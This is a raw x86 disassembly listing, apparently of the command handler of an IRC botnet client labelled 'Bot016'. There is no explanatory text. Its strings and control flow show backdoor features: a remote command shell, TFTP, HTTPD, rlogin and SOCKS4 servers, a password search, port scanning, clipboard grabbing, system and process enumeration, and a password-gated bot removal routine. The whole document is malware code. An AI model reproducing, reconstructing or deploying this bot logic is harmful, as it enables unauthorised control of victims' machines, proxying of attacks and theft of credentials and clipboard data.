jmp loc_408C96
; ---------------------------------------------------------------------------
loc_40CAC5: ; CODE XREF: sub_408A18+40BB�j
push 32h
call ds:dword_420000 ; Sleep
loc_40CACD: ; CODE XREF: sub_408A18+404D�j
cmp [ebp+var_4C4], esi
jz short loc_40CAC5
jmp short loc_40CA82
; ---------------------------------------------------------------------------
loc_40CAD7: ; CODE XREF: sub_408A18+3EBA�j
lea eax, [ebp+var_2F0]
push offset aScanFailedTo_1 ; "[SCAN]: Failed to start scan, port is i"...
push eax
call sub_4145E5
pop ecx
pop ecx
jmp loc_40E4CA
; ---------------------------------------------------------------------------
loc_40CAEF: ; CODE XREF: sub_408A18+1865�j
; sub_408A18+1879�j
push [ebp+var_A0]
lea eax, [ebp+var_B8]
push 80h
push eax
call sub_41483D
mov eax, [ebp+arg_4]
mov [ebp+var_BC], eax
mov eax, [ebp+var_4]
mov [ebp+var_34], eax
mov eax, [ebp+var_8]
push offset aFindpassSearch ; "[FINDPASS]: Searching for password."
mov [ebp+var_30], eax
lea eax, [ebp+var_2F0]
push 200h
push eax
call sub_41483D
xor esi, esi
push esi
lea eax, [ebp+var_2F0]
push 1Eh
push eax
call sub_412471
add esp, 24h
mov [ebp+var_38], eax
lea eax, [ebp+var_18]
push eax
push esi
lea eax, [ebp+var_BC]
push eax
push offset sub_4037CA
push esi
push esi
call ds:dword_42000C ; CreateThread
mov ecx, [ebp+var_38]
imul ecx, 234h
cmp eax, esi
mov dword_436694[ecx], eax
jnz short loc_40CB8D
call ds:dword_420008 ; RtlGetLastWin32Error
push eax
push offset aFindpassFail_0 ; "[FINDPASS]: Failed to start search thre"...
jmp loc_40B8EA
; ---------------------------------------------------------------------------
loc_40CB85: ; CODE XREF: sub_408A18+4178�j
push 32h
call ds:dword_420000 ; Sleep
loc_40CB8D: ; CODE XREF: sub_408A18+415A�j
cmp [ebp+var_2C], esi
jz short loc_40CB85
jmp loc_40DA31
; ---------------------------------------------------------------------------
loc_40CB97: ; CODE XREF: sub_408A18+183D�j
; sub_408A18+1851�j
push 5
call sub_412661
test eax, eax
pop ecx
jle short loc_40CBBB
push offset aTftpAlreadyRun ; "[TFTP]: Already running."
loc_40CBA8: ; CODE XREF: sub_408A18+5298�j
lea eax, [ebp+var_2F0]
push eax
call sub_4145E5
xor edi, edi
jmp loc_40DE2E
; ---------------------------------------------------------------------------
loc_40CBBB: ; CODE XREF: sub_408A18+4189�j
mov eax, [ebp+ebx+var_A4]
xor edi, edi
cmp eax, edi
mov esi, 104h
jz short loc_40CBE0
push eax
lea eax, [ebp+var_12B8]
push esi
push eax
call sub_41483D
add esp, 0Ch
jmp short loc_40CBEF
; ---------------------------------------------------------------------------
loc_40CBE0: ; CODE XREF: sub_408A18+41B3�j
push esi
lea eax, [ebp+var_12B8]
push eax
push edi
call ds:dword_420010 ; GetModuleFileNameA
loc_40CBEF: ; CODE XREF: sub_408A18+41C6�j
mov ebx, [ebp+ebx+var_A0]
cmp ebx, edi
jnz short loc_40CBFF
mov ebx, offset byte_42BF44
loc_40CBFF: ; CODE XREF: sub_408A18+41E0�j
push ebx
lea eax, [ebp+var_11B4]
push esi
push eax
call sub_41483D
mov eax, dword_42BEBC
mov [ebp+var_10A8], eax
mov eax, [ebp+arg_4]
push 7Fh
push [ebp+var_A0]
mov [ebp+var_12BC], eax
lea eax, [ebp+var_10A4]
push eax
mov [ebp+var_10AC], edi
call sub_414670
mov eax, [ebp+var_4]
mov [ebp+var_1024], eax
mov eax, [ebp+var_8]
mov [ebp+var_1020], eax
lea eax, [ebp+var_11B4]
push eax
lea eax, [ebp+var_12B8]
push eax
push [ebp+var_10A8]
lea eax, [ebp+var_2F0]
push offset aTftpServerStar ; "[TFTP]: Server started on Port: %d, Fil"...
push eax
call sub_4145E5
push edi
lea eax, [ebp+var_2F0]
push 5
push eax
call sub_412471
add esp, 38h
mov [ebp+var_10B0], eax
lea eax, [ebp+var_18]
push eax
push edi
lea eax, [ebp+var_12BC]
push eax
push offset sub_411FA9
push edi
push edi
call ds:dword_42000C ; CreateThread
mov ecx, [ebp+var_10B0]
imul ecx, 234h
cmp eax, edi
mov dword_436694[ecx], eax
jnz short loc_40CCE1
call ds:dword_420008 ; RtlGetLastWin32Error
push eax
push offset aTftpFailedTo_0 ; "[TFTP]: Failed to start server thread, "...
loc_40CCC5: ; CODE XREF: sub_408A18+53EE�j
lea eax, [ebp+var_2F0]
push eax
call sub_4145E5
add esp, 0Ch
jmp loc_40DE30
; ---------------------------------------------------------------------------
loc_40CCD9: ; CODE XREF: sub_408A18+42CF�j
push 32h
call ds:dword_420000 ; Sleep
loc_40CCE1: ; CODE XREF: sub_408A18+429F�j
cmp [ebp+var_101C], edi
jz short loc_40CCD9
jmp loc_40DE30
; ---------------------------------------------------------------------------
loc_40CCEE: ; CODE XREF: sub_408A18+1815�j
; sub_408A18+1829�j
mov esi, [ebp+ebx+var_A4]
test esi, esi
jz short loc_40CD0D
push esi
call sub_414972
test eax, eax
pop ecx
jz short loc_40CD0D
push esi
call sub_414972
pop ecx
jmp short loc_40CD12
; ---------------------------------------------------------------------------
loc_40CD0D: ; CODE XREF: sub_408A18+42DF�j
; sub_408A18+42EA�j
mov eax, dword_42BEC0
loc_40CD12: ; CODE XREF: sub_408A18+42F3�j
mov ebx, [ebp+ebx+var_A0]
mov [ebp+var_B60], eax
xor eax, eax
cmp [ebp+var_458], al
setz al
xor edi, edi
cmp ebx, edi
mov [ebp+var_B4C], eax
jz short loc_40CD47
lea eax, [ebp+var_C64]
push ebx
push eax
call sub_4145E5
pop ecx
pop ecx
jmp short loc_40CD72
; ---------------------------------------------------------------------------
loc_40CD47: ; CODE XREF: sub_408A18+431C�j
push 104h
lea eax, [ebp+var_AB0]
push eax
call ds:dword_420048 ; GetSystemDirectoryA
push edi
push edi
push edi
lea eax, [ebp+var_D4]
push eax
lea eax, [ebp+var_AB0]
push eax
call sub_415D0D
add esp, 14h
loc_40CD72: ; CODE XREF: sub_408A18+432D�j
lea eax, [ebp+var_C64]
lea edx, [eax+1]
loc_40CD7B: ; CODE XREF: sub_408A18+4368�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40CD7B
sub eax, edx
cmp [ebp+eax+var_C65], 5Ch
jnz short loc_40CDA7
lea eax, [ebp+var_C64]
lea edx, [eax+1]
loc_40CD97: ; CODE XREF: sub_408A18+4384�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40CD97
sub eax, edx
and [ebp+eax+var_C65], cl
loc_40CDA7: ; CODE XREF: sub_408A18+4374�j
push [ebp+var_A0]
mov esi, [ebp+arg_4]
lea eax, [ebp+var_EEC]
push 80h
push eax
mov [ebp+var_EF0], esi
call sub_41483D
mov eax, [ebp+var_8]
mov ebx, [ebp+var_4]
add esp, 0Ch
mov [ebp+var_B50], eax
lea eax, [ebp+var_C64]
push eax
push [ebp+var_B60]
mov [ebp+var_B54], ebx
push esi
call sub_407D51
pop ecx
push eax
lea eax, [ebp+var_2F0]
push offset aHttpdServerLis ; "[HTTPD]: Server listening on IP: %s:%d,"...
push eax
call sub_4145E5
push edi
lea eax, [ebp+var_2F0]
push 4
push eax
call sub_412471
add esp, 20h
mov [ebp+var_B58], eax
lea eax, [ebp+var_18]
push eax
push edi
lea eax, [ebp+var_EF0]
push eax
push offset sub_404F24
push edi
push edi
call ds:dword_42000C ; CreateThread
mov ecx, [ebp+var_B58]
imul ecx, 234h
cmp eax, edi
mov dword_436694[ecx], eax
jnz short loc_40CE62
call ds:dword_420008 ; RtlGetLastWin32Error
push eax
push offset aHttpdFailedT_1 ; "[HTTPD]: Failed to start server thread,"...
jmp loc_40B33C
; ---------------------------------------------------------------------------
loc_40CE5A: ; CODE XREF: sub_408A18+4450�j
push 32h
call ds:dword_420000 ; Sleep
loc_40CE62: ; CODE XREF: sub_408A18+442F�j
cmp [ebp+var_B44], edi
jz short loc_40CE5A
jmp loc_40B34B
; ---------------------------------------------------------------------------
loc_40CE6F: ; CODE XREF: sub_408A18+17ED�j
; sub_408A18+1801�j
mov esi, [ebp+ebx+var_A4]
test esi, esi
jz short loc_40CE8E
push esi
call sub_414972
test eax, eax
pop ecx
jz short loc_40CE8E
push esi
call sub_414972
pop ecx
jmp short loc_40CE93
; ---------------------------------------------------------------------------
loc_40CE8E: ; CODE XREF: sub_408A18+4460�j
; sub_408A18+446B�j
mov eax, dword_42BEC4
loc_40CE93: ; CODE XREF: sub_408A18+4474�j
mov [ebp+var_7CC], eax
mov eax, [ebp+ebx+var_A0]
xor edi, edi
cmp eax, edi
jnz short loc_40CEAC
lea eax, [ebp+var_F0]
loc_40CEAC: ; CODE XREF: sub_408A18+448C�j
push eax
lea eax, [ebp+var_90C]
push 40h
push eax
call sub_41483D
mov ebx, [ebp+ebx+var_9C]
add esp, 0Ch
cmp ebx, edi
jnz short loc_40CECE
mov ebx, 420AEAh
loc_40CECE: ; CODE XREF: sub_408A18+44AF�j
push ebx
lea eax, [ebp+var_8CC]
push 100h
push eax
call sub_41483D
push [ebp+var_A0]
lea eax, [ebp+var_98C]
push 80h
push eax
call sub_41483D
mov eax, [ebp+var_8]
mov esi, [ebp+arg_4]
mov ebx, [ebp+var_4]
add esp, 18h
mov [ebp+var_7B8], eax
lea eax, [ebp+var_90C]
push eax
push [ebp+var_7CC]
mov [ebp+var_990], esi
push esi
mov [ebp+var_7BC], ebx
call sub_407D51
pop ecx
push eax
lea eax, [ebp+var_2F0]
push offset aRlogindServerL ; "[RLOGIND]: Server listening on IP: %s:%"...
push eax
call sub_4145E5
push edi
lea eax, [ebp+var_2F0]
push 7
push eax
call sub_412471
add esp, 20h
mov [ebp+var_7C8], eax
lea eax, [ebp+var_18]
push eax
push edi
lea eax, [ebp+var_990]
push eax
push offset sub_40F76F
push edi
push edi
call ds:dword_42000C ; CreateThread
mov ecx, [ebp+var_7C8]
imul ecx, 234h
cmp eax, edi
mov dword_436694[ecx], eax
jnz short loc_40CF9B
call ds:dword_420008 ; RtlGetLastWin32Error
push eax
push offset aRlogindFailedT ; "[RLOGIND]: Failed to start server threa"...
jmp loc_40B33C
; ---------------------------------------------------------------------------
loc_40CF93: ; CODE XREF: sub_408A18+4589�j
push 32h
call ds:dword_420000 ; Sleep
loc_40CF9B: ; CODE XREF: sub_408A18+4568�j
cmp [ebp+var_7B4], edi
jz short loc_40CF93
jmp loc_40B34B
; ---------------------------------------------------------------------------
loc_40CFA8: ; CODE XREF: sub_408A18+17C5�j
; sub_408A18+17D9�j
mov ebx, [ebp+ebx+var_A4]
test ebx, ebx
jz short loc_40CFBB
push ebx
call sub_414972
jmp short loc_40CFC2
; ---------------------------------------------------------------------------
loc_40CFBB: ; CODE XREF: sub_408A18+4599�j
push 9
call sub_412680
loc_40CFC2: ; CODE XREF: sub_408A18+45A1�j
test eax, eax
pop ecx
jz loc_40E538
push eax
push [ebp+var_4]
push [ebp+var_A0]
push [ebp+arg_4]
call sub_4010CA
jmp loc_40D4B1
; ---------------------------------------------------------------------------
loc_40CFE2: ; CODE XREF: sub_408A18+179D�j
; sub_408A18+17B1�j
mov eax, dword_4358CC
test eax, eax
jz short loc_40D005
call eax ; DnsFlushResolverCache
test eax, eax
lea eax, [ebp+var_2F0]
jz short loc_40CFFE
push offset aFlushdnsDnsCac ; "[FLUSHDNS]: DNS cache flushed."
jmp short loc_40D026
; ---------------------------------------------------------------------------
loc_40CFFE: ; CODE XREF: sub_408A18+45DD�j
push offset aFlushdnsFailed ; "[FLUSHDNS]: Failed to flush DNS cache."
jmp short loc_40D026
; ---------------------------------------------------------------------------
loc_40D005: ; CODE XREF: sub_408A18+45D1�j
push offset aFlushdnsFail_0 ; "[FLUSHDNS]: Failed to load dnsapi.dll."
lea eax, [ebp+var_2F0]
jmp short loc_40D026
; ---------------------------------------------------------------------------
loc_40D012: ; CODE XREF: sub_408A18+1775�j
; sub_408A18+1789�j
call sub_407C73
test eax, eax
lea eax, [ebp+var_2F0]
jz short loc_40D036
push offset aFlushdnsArpC_0 ; "[FLUSHDNS]: ARP cache flushed."
loc_40D026: ; CODE XREF: sub_408A18+45E4�j
; sub_408A18+45EB�j ...
push 200h
push eax
call sub_41483D
jmp loc_40D943
; ---------------------------------------------------------------------------
loc_40D036: ; CODE XREF: sub_408A18+4607�j
push offset aFlushdnsFail_1 ; "[FLUSHDNS]: Failed to flush ARP cache."
jmp short loc_40D026
; ---------------------------------------------------------------------------
loc_40D03D: ; CODE XREF: sub_408A18+174D�j
; sub_408A18+1761�j
cmp [ebp+var_8], 0
jnz short loc_40D05E
push 0
push [ebp+var_4]
push offset aClipboardData ; "-[Clipboard Data]-"
push [ebp+var_A0]
push [ebp+arg_4]
call sub_4056FB
add esp, 14h
loc_40D05E: ; CODE XREF: sub_408A18+4629�j
push 0
push [ebp+var_4]
call sub_4068B0
push eax
push [ebp+var_A0]
push [ebp+arg_4]
call sub_4056FB
push offset aMainGetClipboa ; "[MAIN]: Get Clipboard."
jmp loc_40D37A
; ---------------------------------------------------------------------------
loc_40D081: ; CODE XREF: sub_408A18+13BE�j
; sub_408A18+13D2�j
push 8
call sub_412661
test eax, eax
pop ecx
jle short loc_40D097
push offset aCmdRemoteShell ; "[CMD]: Remote shell already running."
jmp loc_40C690
; ---------------------------------------------------------------------------
loc_40D097: ; CODE XREF: sub_408A18+4673�j
push [ebp+var_A0]
push [ebp+arg_4]
call sub_40F31C
cmp eax, 0FFFFFFFFh
pop ecx
pop ecx
jnz short loc_40D0B6
push offset aCmdCouldnTOpen ; "[CMD]: Couldn't open remote shell."
jmp loc_40C690
; ---------------------------------------------------------------------------
loc_40D0B6: ; CODE XREF: sub_408A18+4692�j
push offset aCmdRemoteShe_0 ; "[CMD]: Remote shell ready."
jmp loc_40C690
; ---------------------------------------------------------------------------
loc_40D0C0: ; CODE XREF: sub_408A18+1396�j
; sub_408A18+13AA�j
push [ebp+var_8]
push [ebp+var_4]
push [ebp+var_A0]
push [ebp+arg_4]
call sub_406395
jmp loc_40D39B
; ---------------------------------------------------------------------------
loc_40D0D9: ; CODE XREF: sub_408A18+136E�j
; sub_408A18+1382�j
push [ebp+ebx+var_A4]
push [ebp+var_4]
push [ebp+var_A0]
push [ebp+arg_4]
call sub_402E1B
jmp loc_40D39B
; ---------------------------------------------------------------------------
loc_40D0F6: ; CODE XREF: sub_408A18+1346�j
; sub_408A18+135A�j
or esi, 0FFFFFFFFh
call ds:dword_420004 ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
mov ebx, [ebp+ebx+var_A4]
test ebx, ebx
mov edi, eax
jz short loc_40D11E
push ebx
call sub_414972
pop ecx
mov esi, eax
loc_40D11E: ; CODE XREF: sub_408A18+46FB�j
xor edx, edx
mov eax, edi
mov ecx, 15180h
div ecx
cmp eax, esi
jnb short loc_40D136
cmp esi, 0FFFFFFFFh
jnz loc_40E538
loc_40D136: ; CODE XREF: sub_408A18+4713�j
push 0
call sub_4115DB
push eax
lea eax, [ebp+var_2F0]
push offset aMainUptimeS_ ; "[MAIN]: Uptime: %s."
push eax
call sub_4145E5
push 0
push [ebp+var_4]
lea eax, [ebp+var_2F0]
push eax
push [ebp+var_A0]
push [ebp+arg_4]
call sub_4056FB
lea eax, [ebp+var_2F0]
push eax
call sub_401EFF
loc_40D175: ; CODE XREF: sub_408A18+24D3�j
add esp, 28h
jmp loc_40E538
; ---------------------------------------------------------------------------
loc_40D17D: ; CODE XREF: sub_408A18+131E�j
; sub_408A18+1332�j
push 1Fh
call sub_412661
test eax, eax
pop ecx
jle short loc_40D1B3
cmp [ebp+var_8], 0
jnz loc_408C96
push 0
push [ebp+var_4]
push offset aProcAlreadyRun ; "[PROC]: Already running."
loc_40D19D: ; CODE XREF: sub_408A18+1F56�j
push [ebp+var_A0]
push [ebp+arg_4]
call sub_4056FB
add esp, 14h
jmp loc_408C96
; ---------------------------------------------------------------------------
loc_40D1B3: ; CODE XREF: sub_408A18+476F�j
push [ebp+var_A0]
lea eax, [ebp+var_450]
push 80h
push eax
call sub_41483D
mov eax, [ebp+arg_4]
mov ebx, [ebp+ebx+var_A4]
and [ebp+var_3CC], 0
mov [ebp+var_454], eax
mov eax, [ebp+var_4]
mov [ebp+var_3C8], eax
mov eax, [ebp+var_8]
add esp, 0Ch
test ebx, ebx
mov [ebp+var_3C4], eax
jz short loc_40D214
push 5
mov edi, ebx
mov esi, offset aFull ; "full"
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_40D214
mov [ebp+var_3CC], 1
loc_40D214: ; CODE XREF: sub_408A18+47E0�j
; sub_408A18+47F0�j
lea eax, [ebp+var_2F0]
push offset aProcsProccessL ; "[PROCS]: Proccess list."
push eax
call sub_4145E5
xor esi, esi
push esi
lea eax, [ebp+var_2F0]
push 1Fh
push eax
call sub_412471
add esp, 14h
mov [ebp+var_3D0], eax
lea eax, [ebp+var_18]
push eax
push esi
lea eax, [ebp+var_454]
push eax
push offset sub_408519
push esi
push esi
call ds:dword_42000C ; CreateThread
mov ecx, [ebp+var_3D0]
imul ecx, 234h
cmp eax, esi
mov dword_436694[ecx], eax
jnz short loc_40D296
call ds:dword_420008 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_2F0]
push offset aProcsFailedToS ; "[PROCS]: Failed to start listing thread"...
push eax
call sub_4145E5
add esp, 0Ch
jmp loc_40C0D2
; ---------------------------------------------------------------------------
loc_40D28E: ; CODE XREF: sub_408A18+4884�j
push 32h
call ds:dword_420000 ; Sleep
loc_40D296: ; CODE XREF: sub_408A18+4854�j
cmp [ebp+var_3C0], esi
jz short loc_40D28E
jmp loc_40C0D2
; ---------------------------------------------------------------------------
loc_40D2A3: ; CODE XREF: sub_408A18+12F6�j
; sub_408A18+130A�j
mov ebx, [ebp+ebx+var_A4]
test ebx, ebx
jz loc_408C96
mov esi, ebx
mov eax, offset aN3m3s1s ; "n3m3s1s"
loc_40D2B9: ; CODE XREF: sub_408A18+48BD�j
mov dl, [eax]
mov cl, dl
cmp dl, [esi]
jnz short loc_40D2DB
test cl, cl
jz short loc_40D2D7
mov dl, [eax+1]
mov cl, dl
cmp dl, [esi+1]
jnz short loc_40D2DB
inc eax
inc eax
inc esi
inc esi
test cl, cl
jnz short loc_40D2B9
loc_40D2D7: ; CODE XREF: sub_408A18+48AB�j
xor eax, eax
jmp short loc_40D2E0
; ---------------------------------------------------------------------------
loc_40D2DB: ; CODE XREF: sub_408A18+48A7�j
; sub_408A18+48B5�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_40D2E0: ; CODE XREF: sub_408A18+48C1�j
test eax, eax
jnz loc_408C96
cmp [ebp+var_8], eax
jnz short loc_40D307
push eax
push [ebp+var_4]
push offset aMainRemovingBo ; "[MAIN]: Removing Bot."
push [ebp+var_A0]
push [ebp+arg_4]
call sub_4056FB
add esp, 14h
loc_40D307: ; CODE XREF: sub_408A18+48D3�j
push [ebp+arg_4]
call dword_4358F4 ; closesocket
call dword_435900 ; WSACleanup
call sub_406A33
jmp loc_40DA56
; ---------------------------------------------------------------------------
loc_40D320: ; CODE XREF: sub_408A18+12CE�j
; sub_408A18+12E2�j
push 0
push [ebp+var_4]
lea eax, [ebp+var_2F0]
push [ebp+arg_4]
push eax
call sub_41175C
pop ecx
pop ecx
push eax
push [ebp+var_A0]
push [ebp+arg_4]
call sub_4056FB
push offset aMainSystemInfo ; "[MAIN]: System Info."
jmp short loc_40D37A
; ---------------------------------------------------------------------------
loc_40D34C: ; CODE XREF: sub_408A18+12A6�j
; sub_408A18+12BA�j
push 0
push [ebp+var_4]
lea eax, [ebp+var_2F0]
push [ebp+arg_4]
push [ebp+arg_1C]
push eax
call sub_4119C3
add esp, 0Ch
push eax
push [ebp+var_A0]
push [ebp+arg_4]
call sub_4056FB
push offset aMainNetworkInf ; "[MAIN]: Network Info."
loc_40D37A: ; CODE XREF: sub_408A18+4664�j
; sub_408A18+4932�j
call sub_401EFF
loc_40D37F: ; CODE XREF: sub_408A18+33D0�j
add esp, 18h
jmp loc_40E538
; ---------------------------------------------------------------------------
loc_40D387: ; CODE XREF: sub_408A18+127E�j
; sub_408A18+1292�j
push [ebp+var_8]
push [ebp+var_4]
push [ebp+var_A0]
push [ebp+arg_4]
call sub_401F9F
loc_40D39B: ; CODE XREF: sub_408A18+1DF�j
; sub_408A18+46BC�j ...
add esp, 10h
jmp loc_408C96
; ---------------------------------------------------------------------------
loc_40D3A3: ; CODE XREF: sub_408A18+1256�j
; sub_408A18+126A�j
and [ebp+var_A3C], 0
cmp [ebp+var_14], 0
jz short loc_40D3E4
mov ebx, [ebp+ebx+var_A4]
test ebx, ebx
jz short loc_40D3E4
push ebx
push [ebp+var_14]
call sub_4150B0
test eax, eax
pop ecx
pop ecx
jz short loc_40D3E4
push eax
push offset aS_2 ; "%s"
lea eax, [ebp+var_A3C]
push 80h
push eax
call sub_41483D
add esp, 10h
loc_40D3E4: ; CODE XREF: sub_408A18+4996�j
; sub_408A18+49A1�j ...
push [ebp+var_A0]
lea eax, [ebp+var_ABC]
push 80h
push eax
call sub_41483D
mov eax, [ebp+arg_4]
mov [ebp+var_AC0], eax
mov eax, [ebp+var_4]
mov [ebp+var_9B8], eax
mov eax, [ebp+var_8]
mov [ebp+var_9B4], eax
lea eax, [ebp+var_2F0]
push offset aLogListingLog_ ; "[LOG]: Listing log."
push eax
call sub_4145E5
xor esi, esi
push esi
lea eax, [ebp+var_2F0]
push 1Dh
push eax
call sub_412471
add esp, 20h
mov [ebp+var_9BC], eax
lea eax, [ebp+var_18]
push eax
push esi
lea eax, [ebp+var_AC0]
push eax
push offset sub_402011
push esi
push esi
call ds:dword_42000C ; CreateThread
mov ecx, [ebp+var_9BC]
imul ecx, 234h
cmp eax, esi
mov dword_436694[ecx], eax
jnz short loc_40D489
call ds:dword_420008 ; RtlGetLastWin32Error
push eax
push offset aLogFailedToSta ; "[LOG]: Failed to start listing thread, "...
jmp loc_40E6F1
; ---------------------------------------------------------------------------
loc_40D481: ; CODE XREF: sub_408A18+4A77�j
push 32h
call ds:dword_420000 ; Sleep
loc_40D489: ; CODE XREF: sub_408A18+4A56�j
cmp [ebp+var_9B0], esi
jz short loc_40D481
jmp loc_408C96
; ---------------------------------------------------------------------------
loc_40D496: ; CODE XREF: sub_408A18+122E�j
; sub_408A18+1242�j
push [ebp+var_4]
push [ebp+var_A0]
push [ebp+arg_4]
call sub_401E87
push offset aMainAliasList_ ; "[MAIN]: Alias list."
call sub_401EFF
loc_40D4B1: ; CODE XREF: sub_408A18+45C5�j
add esp, 10h
jmp loc_40E538
; ---------------------------------------------------------------------------
loc_40D4B9: ; CODE XREF: sub_408A18+1206�j
; sub_408A18+121A�j
push [ebp+var_A0]
lea eax, [ebp+var_384]
push 80h
push eax
call sub_41483D
mov eax, [ebp+arg_4]
mov ebx, [ebp+ebx+var_A4]
mov [ebp+var_388], eax
mov eax, [ebp+var_4]
mov [ebp+var_2FC], eax
mov eax, [ebp+var_8]
add esp, 0Ch
test ebx, ebx
mov [ebp+var_2F8], eax
jz short loc_40D512
push 4
xor eax, eax
mov edi, offset aSub ; "sub"
mov esi, ebx
pop ecx
repe cmpsb
setz al
mov [ebp+var_300], eax
jmp short loc_40D519
; ---------------------------------------------------------------------------
loc_40D512: ; CODE XREF: sub_408A18+4ADF�j
and [ebp+var_300], 0
loc_40D519: ; CODE XREF: sub_408A18+4AF8�j
lea eax, [ebp+var_2F0]
push offset aThreadsListThr ; "[THREADS]: List threads."
push eax
call sub_4145E5
xor esi, esi
push esi
lea eax, [ebp+var_2F0]
push 20h
push eax
call sub_412471
add esp, 14h
mov [ebp+var_304], eax
lea eax, [ebp+var_18]
push eax
push esi
lea eax, [ebp+var_388]
push eax
push offset sub_412772
push esi
push esi
call ds:dword_42000C ; CreateThread
mov ecx, [ebp+var_304]
imul ecx, 234h
cmp eax, esi
mov dword_436694[ecx], eax
jnz short loc_40D59B
call ds:dword_420008 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_2F0]
push offset aThreadsFaile_0 ; "[THREADS]: Failed to start list thread,"...
push eax
call sub_4145E5
add esp, 0Ch
jmp loc_40A140
; ---------------------------------------------------------------------------
loc_40D593: ; CODE XREF: sub_408A18+4B89�j
push 32h
call ds:dword_420000 ; Sleep
loc_40D59B: ; CODE XREF: sub_408A18+4B59�j
cmp [ebp+var_2F4], esi
jz short loc_40D593
jmp loc_40A140
; ---------------------------------------------------------------------------
loc_40D5A8: ; CODE XREF: sub_408A18+118C�j
; sub_408A18+11A0�j
push offset aBot016 ; "Bot016"
lea eax, [ebp+var_2F0]
push offset aMainBotIdS_ ; "[MAIN]: Bot ID: %s."
push eax
call sub_4145E5
push 0
push [ebp+var_4]
lea eax, [ebp+var_2F0]
push eax
push [ebp+var_A0]
push [ebp+arg_4]
call sub_4056FB
add esp, 20h
jmp loc_40A140
; ---------------------------------------------------------------------------
loc_40D5E0: ; CODE XREF: sub_408A18+1164�j
; sub_408A18+1178�j
push dword_47BEF8
call sub_4115DB
push eax
lea eax, [ebp+var_2F0]
push offset aMainStatusRead ; "[MAIN]: Status: Ready. Bot Uptime: %s."
push eax
call sub_4145E5
push 0
push [ebp+var_4]
lea eax, [ebp+var_2F0]
push eax
push [ebp+var_A0]
push [ebp+arg_4]
call sub_4056FB
add esp, 24h
jmp loc_40A140
; ---------------------------------------------------------------------------
loc_40D61F: ; CODE XREF: sub_408A18+113C�j
; sub_408A18+1150�j
mov ebx, [ebp+ebx+var_A4]
test ebx, ebx
jz short loc_40D652
cmp [ebp+var_14], 0
jz short loc_40D661
push ebx
push [ebp+var_14]
call sub_4150B0
test eax, eax
pop ecx
pop ecx
jz short loc_40D661
push eax
push offset aQuitS ; "QUIT :%s\r\n"
push [ebp+arg_4]
call sub_4056B0
add esp, 0Ch
jmp short loc_40D661
; ---------------------------------------------------------------------------
loc_40D652: ; CODE XREF: sub_408A18+4C10�j
push offset aQuitLater ; "QUIT :later\r\n"
push [ebp+arg_4]
call sub_4056B0
pop ecx
pop ecx
loc_40D661: ; CODE XREF: sub_408A18+4C16�j
; sub_408A18+4C25�j ...
push 0FFFFFFFEh
pop eax
jmp loc_408C99
; ---------------------------------------------------------------------------
loc_40D669: ; CODE XREF: sub_408A18+1114�j
; sub_408A18+1128�j
push offset aQuitDisconnect ; "QUIT :disconnecting\r\n"
push [ebp+arg_4]
call sub_4056B0
push offset aMainDisconnect ; "[MAIN]: Disconnecting."
call sub_401EFF
add esp, 0Ch
or eax, 0FFFFFFFFh
jmp loc_408C99
; ---------------------------------------------------------------------------
loc_40D68B: ; CODE XREF: sub_408A18+10EC�j
; sub_408A18+1100�j
push offset aQuitReconnecti ; "QUIT :reconnecting\r\n"
push [ebp+arg_4]
call sub_4056B0
push offset aMainReconnecti ; "[MAIN]: Reconnecting."
call sub_401EFF
add esp, 0Ch
xor eax, eax
jmp loc_408C99
; ---------------------------------------------------------------------------
loc_40D6AC: ; CODE XREF: sub_408A18+10C4�j
; sub_408A18+10D8�j
push [ebp+var_4]
push [ebp+var_A0]
push [ebp+arg_4]
call sub_401000
loc_40D6BD: ; CODE XREF: sub_408A18+3337�j
add esp, 0Ch
jmp loc_40E538
; ---------------------------------------------------------------------------
loc_40D6C5: ; CODE XREF: sub_408A18+1024�j
; sub_408A18+1038�j
push [ebp+ebx+var_A4]
push 1Fh
push offset aProcessList ; "Process list"
push offset aProc ; "[PROC]"
jmp short loc_40D6ED
; ---------------------------------------------------------------------------
loc_40D6DA: ; CODE XREF: sub_408A18+FFC�j
; sub_408A18+1010�j
push [ebp+ebx+var_A4]
push 1Ch
push offset aFindFile ; "Find file"
push offset aFindfile_0 ; "[FINDFILE]"
loc_40D6ED: ; CODE XREF: sub_408A18+E39�j
; sub_408A18+E61�j ...
push [ebp+var_8]
push [ebp+var_4]
push [ebp+var_A0]
push [ebp+arg_4]
call sub_4126A7
add esp, 20h
jmp loc_408C96
; ---------------------------------------------------------------------------
loc_40D709: ; CODE XREF: sub_408A18+DFC�j
; sub_408A18+E10�j
mov esi, [ebp+ebx+var_A4]
test esi, esi
jz short loc_40D728
push esi
call sub_414972
test eax, eax
pop ecx
jz short loc_40D728
push esi
call sub_414972
pop ecx
jmp short loc_40D72D
; ---------------------------------------------------------------------------
loc_40D728: ; CODE XREF: sub_408A18+4CFA�j
; sub_408A18+4D05�j
mov eax, dword_42BEB8
loc_40D72D: ; CODE XREF: sub_408A18+4D0E�j
mov ebx, [ebp+ebx+var_A0]
xor edi, edi
cmp ebx, edi
mov [ebp+var_30C], eax
jz short loc_40D754
push ebx
loc_40D741: ; CODE XREF: sub_408A18+4D4C�j
lea eax, [ebp+var_31C]
push 10h
push eax
call sub_41483D
add esp, 0Ch
jmp short loc_40D76D
; ---------------------------------------------------------------------------
loc_40D754: ; CODE XREF: sub_408A18+4D26�j
cmp [ebp+var_45B], 0
jz short loc_40D766
lea eax, [ebp+var_F0]
push eax
jmp short loc_40D741
; ---------------------------------------------------------------------------
loc_40D766: ; CODE XREF: sub_408A18+4D43�j
and [ebp+var_31C], 0
loc_40D76D: ; CODE XREF: sub_408A18+4D3A�j
mov eax, [ebp+var_4]
push [ebp+var_A0]
mov esi, [ebp+arg_4]
mov [ebp+var_300], eax
mov eax, [ebp+var_8]
mov [ebp+var_2FC], eax
lea eax, [ebp+var_39C]
push 80h
push eax
mov [ebp+var_3A0], esi
call sub_41483D
add esp, 0Ch
push [ebp+var_30C]
push esi
call sub_407D51
pop ecx
push eax
lea eax, [ebp+var_2F0]
push offset aSocks4ServerSt ; "[SOCKS4]: Server started on: %s:%d."
push eax
call sub_4145E5
push edi
lea eax, [ebp+var_2F0]
push 12h
push eax
call sub_412471
add esp, 1Ch
mov [ebp+var_308], eax
lea eax, [ebp+var_18]
